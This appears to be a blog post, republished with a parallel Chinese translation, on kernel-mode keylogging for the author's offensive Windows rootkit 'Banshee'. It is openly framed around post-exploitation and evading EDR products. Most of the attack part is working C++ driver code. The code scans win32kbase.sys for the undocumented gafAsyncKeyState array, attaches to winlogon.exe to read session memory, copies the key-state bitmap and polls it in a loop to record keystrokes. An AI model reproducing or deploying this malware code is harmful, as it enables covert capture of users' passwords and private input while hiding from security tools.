Keylogging in the Windows kernel with undocumented data structures

渗透技巧 2个月前 admin

22 0 0

If you are into rootkits and offensive windows kernel driver development, you have probably watched the talk Close Encounters of the Advanced Persistent Kind: Leveraging Rootkits for Post-Exploitation, by Valentina Palmiotti (@chompie1337) and Ruben Boonen (@FuzzySec), in which they talk about using rootkits for offensive operations. I do believe that rootkits are the future of post-exploitation and EDR evasion – EDR is getting tougher to evade in userland and Windows drivers are full of vulnerabilites which can be exploited to deploy rootkits. One part of this talk however particularly caught my interest: Around the 16 minute mark, Valentina talks about kernel mode keylogging. She describes the abstract process of how they achieve this in their rootkit as follows:
如果您热衷于 Rootkit 和攻击性 Windows 内核驱动程序开发，您可能已经观看了 Valentina Palmiotti (@chompie1337) 和 Ruben Boonen (@FuzzySec) 的演讲《高级持久类型的近距离接触：利用 Rootkit 进行后利用》，其中他们谈论使用 Rootkit 进行攻击性操作。我确实相信 Rootkit 是后利用和 EDR 规避的未来 – EDR 在用户空间中越来越难以规避，并且 Windows 驱动程序充满了可被利用来部署 Rootkit 的漏洞。然而，这次演讲的一部分特别引起了我的兴趣：在 16 分钟左右，Valentina 谈论了内核模式键盘记录。她描述了他们如何在 rootkit 中实现这一目标的抽象过程如下：

The basic idea revolves around gafAsyncKeyState (gaf = global af?), which is an undocumented kernel structure in win32kbase.sys used by NtUserGetAsyncKeyState (this structure exists up to Windows 10 – more on that at the end or in the talk linked above).
基本思想围绕 gafAsyncKeyState （gaf = 全局 af？），它是 win32kbase.sys 中 NtUserGetAsyncKeyState 使用的未记录的内核结构（此结构存在于 Windows 10 – 更多内容请参见最后或上面链接的演讲）。

By first locating and then parsing this structure, we can read keystrokes the way that NtUserGetAsyncKeyState does, without calling any APIs at all.
通过首先定位然后解析这个结构，我们可以像 NtUserGetAsyncKeyState 那样读取击键，而无需调用任何 API。

As always, game cheaters have been ahead of the curve, since they have been battling in the kernel with anticheats for a long time. One thread explaining this technique dates back to 2019 for example.
与往常一样，游戏作弊者一直处于领先地位，因为他们在内核中与反作弊者斗争了很长时间。例如，解释这一技术的一条线索可以追溯到 2019 年。

In the talk, they also give the idea to map this memory into a usermode virtual address, to then poll this memory from a usermode process. I roughly implemented their approach, but skipped this memory mapping part, as in my rootkit Banshee (for now) I might as well read from the kernel directly. In this short post I want to give an idea about how I approached the implementation with the guideline from the talk.
在演讲中，他们还提出了将该内存映射到用户模式虚拟地址的想法，然后从用户模式进程轮询该内存。我粗略地实现了他们的方法，但跳过了这个内存映射部分，就像在我的 Rootkit Banshee 中一样（目前）我也可以直接从内核读取。在这篇简短的文章中，我想介绍一下我如何根据演讲中的指导方针来实现。

Implementation 执行

The first challenge is of course to locate gafAsyncKeyState. Since the offset of gafAsyncKeyState in relation to win32kbase.sys base address is different across versions of Windows, we have to resolve it dynamically. One common technique is to look for a function that accesses it in some instruction, find that instruction and then read out the target address.
第一个挑战当然是找到 gafAsyncKeyState 。由于 gafAsyncKeyState 相对于 win32kbase.sys 基地址的偏移量在不同的 Windows 版本中是不同的，因此我们必须动态地解析它。一种常见的技术是寻找在某些指令中访问它的函数，找到该指令，然后读出目标地址。

Signature scanning 签名扫描

We know that NtUserGetAsyncKeyState needs to access this array. We can verify this by looking at the disassembly of NtUserGetAsyncKeyState in IDA, and spot a reference to our target structure, next to a MOV rax qword ptr instruction.
我们知道 NtUserGetAsyncKeyState 需要访问这个数组。我们可以通过查看 IDA 中 NtUserGetAsyncKeyState 的反汇编来验证这一点，并在 MOV rax qword ptr 指令旁边找到对目标结构的引用。

Keylogging in the Windows kernel with undocumented data structures

This is the first MOV rax qword ptr since the beginning of the function – thus we can locate it by simply scanning for the first occurence of the bytes corresponding to that instruction (starting from the functions beginning) and reading the offset from the operand.
这是自函数开始以来的第一个 MOV rax qword ptr – 因此我们可以通过简单地扫描与该指令对应的字节的第一次出现（从函数开头开始）并读取从操作数。

The MOV rax qword ptr instruction is represented in bytes as followed:
MOV rax qword ptr 指令以字节为单位表示如下：

48 8B 05 <32bit offset>

So if we find that pattern and extract the offset, we can calculate the address of our target structure gafAsyncKeyState.
因此，如果我们找到该模式并提取偏移量，我们就可以计算出目标结构 gafAsyncKeyState 的地址。

Code for finding such a pattern in C++ is simple. You (and I, lol) should probably write a signature scanning engine, since this is a common task in a rootkit that deals with dynamic offsets, but for now a naive implementation shall suffice. However, there is one more hurdle.
在 C++ 中查找此类模式的代码很简单。你（和我，哈哈）可能应该编写一个签名扫描引擎，因为这是处理动态偏移量的 Rootkit 中的常见任务，但现在一个简单的实现就足够了。然而，还有一个障碍。

Session driver address space
会话驱动程序地址空间

If we try to access the memory of win32kbase with WinDbg attached to our kernel, we will see that (usually) we are not able to read the memory from that address.
如果我们尝试使用附加到内核的 WinDbg 来访问 win32kbase 的内存，我们会发现（通常）我们无法从该地址读取内存。

Keylogging in the Windows kernel with undocumented data structures

This is because the win32kbase.sys driver is a session driver and operates in session space, a special area of system memory that is only readable through a process running in a session. This makes sense, as the keystrokes should be handled different for every user that has a session connected.
这是因为 win32kbase.sys 驱动程序是一个会话驱动程序，并在会话空间中运行，会话空间是系统内存的一个特殊区域，只能通过会话中运行的进程读取。这是有道理的，因为对于连接会话的每个用户来说，击键的处理方式应该不同。

Thus, to access this memory, we will first have to attach to a process running in the target session. In WinDbg, this is possible with the !session command. In our driver, we will have to call KeStackAttachProcess, and afterwards, KeUnstackDetachProcess.
因此，要访问此内存，我们首先必须附加到目标会话中运行的进程。在 WinDbg 中，可以使用 !session 命令实现这一点。在我们的驱动程序中，我们必须调用 KeStackAttachProcess ，然后调用 KeUnstackDetachProcess 。

Keylogging in the Windows kernel with undocumented data structures

A common process to choose is winlogon.exe, as you can be sure it is always running and attached to a session. Another common choice seems to be csrss.exe, but make sure to choose the right one, as only one of the two commonly running instances runs in a session context.
选择的常见进程是 winlogon.exe ，因为您可以确定它始终在运行并附加到会话。另一种常见的选择似乎是 csrss.exe ，但请确保选择正确的选择，因为两个常用运行实例中只有一个在会话上下文中运行。

Putting it all together, here we have simple code to resolve the address of gafAsyncKeyState. Error handling is omitted for brevity, and some functions (e.g. GetSystemRoutineAddress, LOG_MSG or GetPidFromProcessName are own implementations, but should be trivial to recreate and self-explanatory. Else you can look them up in Banshee):
将它们放在一起，这里我们有简单的代码来解析 gafAsyncKeyState 的地址。为了简洁起见，省略了错误处理，并且某些函数（例如 GetSystemRoutineAddress 、 LOG_MSG 或 GetPidFromProcessName 是自己的实现，但重新创建应该很简单并且不言自明。否则你可以在 Banshee 中查找它们）：

PVOID Resolve_gafAsyncKeyState()
{
	KAPC_STATE apc;
	PVOID address = 0;
	PEPROCESS targetProc = 0;

	// Resolve winlogon's PID
	UNICODE_STRING processName;
	RtlInitUnicodeString(&processName, L"winlogon.exe");
	HANDLE procId = GetPidFromProcessName(processName); 
	PsLookupProcessByProcessId(procId, &targetProc);
		
	// Get Address of NtUserGetAsyncKeyState
	DWORD64 ntUserGetAsyncKeyState = (DWORD64)GetSystemRoutineAddress(Win32kBase, "NtUserGetAsyncKeyState");

	// Attach to winlogon.exe to enable reading of session space memory
	KeStackAttachProcess(targetProc, &apc);

	// Starting from NtUserGetAsyncKeyState, look for our byte signature
	for (INT i=0; i < 500; ++i)
	{
		if (
		   *(BYTE*)(ntUserGetAsyncKeyState + i)     == 0x48 &&
		   *(BYTE*)(ntUserGetAsyncKeyState + i + 1) == 0x8b &&
		   *(BYTE*)(ntUserGetAsyncKeyState + i + 2) == 0x05
		)
		{
			// MOV rax qword ptr instruction found!
			// The 32bit param is the offset from the next instruction to the address of gafAsyncKeyState
			UINT32 offset = (*(PUINT32)(ntUserGetAsyncKeyState + i + 3));
			// Calculate the address: the address of NtUserGetAsyncKeyState + our current offset while scanning + 4 bytes for the 32bit parameter itself + the offset parsed from the parameter = our target address
			address = (PVOID)(ntUserGetAsyncKeyState + (i + 3) + 4 + offset); 
			break;
		}
	}

	LOG_MSG("Found address to gafAsyncKeyState at offset [NtUserGetAsyncKeyState]+%i: 0x%llx\n", i, address);

	// Detach from the process
	KeUnstackDetachProcess(&apc);
	
	ObDereferenceObject(targetProc);
	return address;
}

With the address of our structure of interest, we now just need to find out how we can parse it.
有了我们感兴趣的结构的地址，我们现在只需要找出如何解析它。

Parsing keystrokes 解析击键

While I first started to reverse engineer NtUserGetAsyncKeyState in Ghidra, it came to my mind that folks way smarter than me already did that, and looked up the function in ReactOS.
当我第一次开始在 Ghidra 中进行逆向工程 NtUserGetAsyncKeyState 时，我想到比我聪明得多的人已经这样做了，并在 ReactOS 中查找了该函数。

Here, we can see how this function simply accesses the gafAsyncKeyState array with the IS_KEY_DOWN macro, to determine if a key is pressed, according to its Virtual Key-Code.
在这里，我们可以看到该函数如何使用 IS_KEY_DOWN 宏简单地访问 gafAsyncKeyState 数组，以根据其虚拟键代码确定是否按下了某个键。

The IS_KEY_DOWN macro simply checks if the bit corresponding to the virtual key-code is set and returns TRUE if it is. So our structure, gafAsyncKeyState, is simply an array of bits that correspond to the states of our keys.
IS_KEY_DOWN 宏只是检查与虚拟键码相对应的位是否已设置，如果设置则返回 TRUE 。因此，我们的结构 gafAsyncKeyState 只是一个与键的状态相对应的位数组。

All that is left now is to copy and paste these macros and implement some basic polling logic (what key is down, was it down last time, …).
现在剩下的就是复制并粘贴这些宏并实现一些基本的轮询逻辑（按下了什么键，上次按下的是哪个键，……）。


// https://github.com/mirror/reactos/blob/c6d2b35ffc91e09f50dfb214ea58237509329d6b/reactos/win32ss/user/ntuser/input.h#L91
#define GET_KS_BYTE(vk) ((vk) * 2 / 8)
#define GET_KS_DOWN_BIT(vk) (1 << (((vk) % 4)*2))
#define GET_KS_LOCK_BIT(vk) (1 << (((vk) % 4)*2 + 1))
#define IS_KEY_DOWN(ks, vk) (((ks)[GET_KS_BYTE(vk)] & GET_KS_DOWN_BIT(vk)) ? TRUE : FALSE)
#define SET_KEY_DOWN(ks, vk, down) (ks)[GET_KS_BYTE(vk)] = ((down) ? \
                                                            ((ks)[GET_KS_BYTE(vk)] | GET_KS_DOWN_BIT(vk)) : \
                                                            ((ks)[GET_KS_BYTE(vk)] & ~GET_KS_DOWN_BIT(vk)))

UINT8 keyStateMap[64] = { 0 };
UINT8 keyPreviousStateMap[64] = { 0 };
UINT8 keyRecentStateMap[64] = { 0 };

VOID UpdateKeyStateMap(const HANDLE& procId, const PVOID& gafAsyncKeyStateAddr)
{
	// Save the previous state of the keys
	memcpy(keyPreviousStateMap, keyStateMap, 64);

	// Copy over the array into our buffer
	SIZE_T size = 0;
	MmCopyVirtualMemory(
		BeGetEprocessByPid(HandleToULong(procId)),
		gafAsyncKeyStateAddr,
		PsGetCurrentProcess(), 
		&keyStateMap,
		sizeof(UINT8[64]),
		KernelMode,
		&size
	);

	// for each keycode ...
	for (auto vk = 0u; vk < 256; ++vk) 
	{
		// ... if key is down but wasn't previously, set it in the recent-state-map as down
		if (IS_KEY_DOWN(keyStateMap, vk) && !(IS_KEY_DOWN(keyPreviousStateMap, vk)))
		{
			SET_KEY_DOWN(keyRecentStateMap, vk, TRUE);
		}
	}
}

BOOLEAN
WasKeyPressed(UINT8 vk)
{
	// Check if a key was pressed since last polling the key state
	BOOLEAN result = IS_KEY_DOWN(keyRecentStateMap, vk);
	SET_KEY_DOWN(keyRecentStateMap, vk, FALSE);
	return result;
}

Then, we can call WasKeyPressed at a regular interval to poll for keystrokes and process them in any way we like:
然后，我们可以定期调用 WasKeyPressed 来轮询击键并以我们喜欢的任何方式处理它们：

#define VK_A 0x41

VOID KeyLoggerFunction()
{
	while (true)
	{
		BeUpdateKeyStateMap(procId, gasAsyncKeyStateAddr);

		// POC: just check if A is pressed
		if (BeWasKeyPressed(VK_A))
		{
			LOG_MSG("A pressed\n");
		}

		// Sleep for 0.1 seconds
		LARGE_INTEGER interval;
		interval.QuadPart = -1 * (LONGLONG)100 * 10000; 
		KeDelayExecutionThread(KernelMode, FALSE, &interval);
	}
}

Logging a keystroke to the kernel debug log works as a simple PoC for the technique – whenever the A key is pressed, we get a debug log in WinDbg.
将击键记录到内核调试日志中可以作为该技术的简单 PoC – 每当按下 A 键时，我们都会在 WinDbg 中获得调试日志。

Keylogging in the Windows kernel with undocumented data structures

You can read the messy code at https://github.com/eversinc33/Banshee.
您可以在 https://github.com/eversinc33/Banshee 阅读混乱的代码。

Some more things to do or look out for are:
还有一些需要做或注意的事情是：

Implement it for Windows >= 11 – the structure is the same, it just is named different and needs to be dereferenced a few times to reach the array
在 Windows >= 11 上实现它 – 结构是相同的，只是命名不同并且需要取消引用几次才能到达数组
If you are interested, go with the approach mentioned by Valentina, with mapping the structure into usermode to read it from there
如果您有兴趣，请采用 Valentina 提到的方法，将结构映射到用户模式以从那里读取它

Happy Hacking! 黑客快乐！